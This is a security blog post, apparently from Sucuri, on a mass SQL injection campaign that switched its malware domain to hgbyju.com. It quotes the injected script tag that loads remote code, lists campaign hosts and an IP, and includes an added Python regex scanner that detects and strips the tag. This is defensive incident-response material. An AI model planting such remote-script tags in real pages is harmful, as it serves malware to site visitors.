Nikjju SQL injection update (now hgbyju.com/r.php)

We posted a few days ago about a mass SQL injection campaign that has been compromising thousands of sites. Our latest numbers show that more than 200,000 pages have been infected with the nikjju.com malware.

However, in the last two days the attackers switched domain names and are now using hgbyju.com to distribute their malware (also hosted at 31.210.100.242). So the following code is now being added to the compromised web sites:

<script src = http://hgbyju.com/r.php <</script>
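The tag above is the indicator a site owner actually has to hunt for, and because the campaign reaches the pages through SQL injection it usually lives in database text columns rather than in files on disk. The following is an added example (not Sucuri's code or a tool mentioned in the post) showing how to scan exported rows or page content for the r.php script tag and strip it. The pattern is an assumption that generalizes the single tag quoted on the page: it tolerates spaces around the `=`, optional quotes, and either `<` or `>` before `</script>`; the list of known hosts is taken from the post, and the sample rows are constructed.

```python
import re
from typing import Dict, List

# Hosts named in the post as serving r.php in this campaign.
KNOWN_CAMPAIGN_HOSTS = {"nikjju.com", "hgbyju.com", "31.210.100.242"}

# Matches the injected tag as quoted in the post:
#   <script src = http://hgbyju.com/r.php <</script>
# Assumed generalization: optional whitespace around '=', optional quotes,
# and a '<' or '>' before the closing </script> (the quoted tag is malformed).
INJECTED_SCRIPT_RE = re.compile(
    r"<script\s+src\s*=\s*['\"]?https?://(?P<host>[a-z0-9.\-]+)/r\.php['\"]?\s*[<>]\s*</script>",
    re.IGNORECASE,
)


def find_injected_scripts(content: str) -> List[Dict[str, object]]:
    """Return every r.php script tag found in content, flagging known campaign hosts."""
    hits = []
    for m in INJECTED_SCRIPT_RE.finditer(content):
        host = m.group("host").lower()
        hits.append({
            "tag": m.group(0),
            "host": host,
            "known_campaign_host": host in KNOWN_CAMPAIGN_HOSTS,
            "offset": m.start(),
        })
    return hits


def strip_injected_scripts(content: str) -> str:
    """Remove the injected tags from a row or page. This only cleans the payload;
    the SQL injection flaw that let it in must still be fixed in the application."""
    return INJECTED_SCRIPT_RE.sub("", content)


def scan_rows(rows: List[str]) -> Dict[int, List[Dict[str, object]]]:
    """Map row index -> hits for every row that carries an injected tag."""
    result = {}
    for i, row in enumerate(rows):
        hits = find_injected_scripts(row)
        if hits:
            result[i] = hits
    return result


# Constructed sample rows standing in for a dump of a text column: two carry the
# injected tag (one in the exact form quoted in the post), one is clean.
SAMPLE_ROWS = [
    "Welcome to our store!<script src = http://hgbyju.com/r.php <</script>",
    "Contact us at sales@example.com",
    'Latest news<script src="http://nikjju.com/r.php"></script>',
]

if __name__ == "__main__":
    for i, hits in scan_rows(SAMPLE_ROWS).items():
        for h in hits:
            print(f"row {i}: host={h['host']} known_campaign_host={h['known_campaign_host']}")
        print("  cleaned:", strip_injected_scripts(SAMPLE_ROWS[i]))
```

Run the scan over every text column of the affected database (or a dump of it) rather than over rendered pages only, since caching and templates can hide how many rows were hit; any hit whose host is not in the known list is worth a look too, because the post shows the attackers rotating domains while keeping the same `/r.php` path.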

This domain name was registered just a few days ago (April 17) by James Northone (jamesnorthone@hotmailbox.com), the same name and e-mail address used on nikjju.com and many other domains from similar malware campaigns (the details are probably fake):

Registrant Contact:
JamesNorthone
James Northone jamesnorthone@hotmailbox.com
+1.5168222749 fax: +1.5168222749
128 Lynn Court
Plainview NY 11803
us

So they have been at this for a while with no sign of stopping.

About Daniel Cid

Daniel is the Founder & CTO of Sucuri and also the founder of the open source project OSSEC HIDS. His interests range from intrusion detection and log analysis (log-based intrusion detection) to web-based malware research and secure development.

You can find more about Daniel at his site dcid.me or on Twitter: @danielcid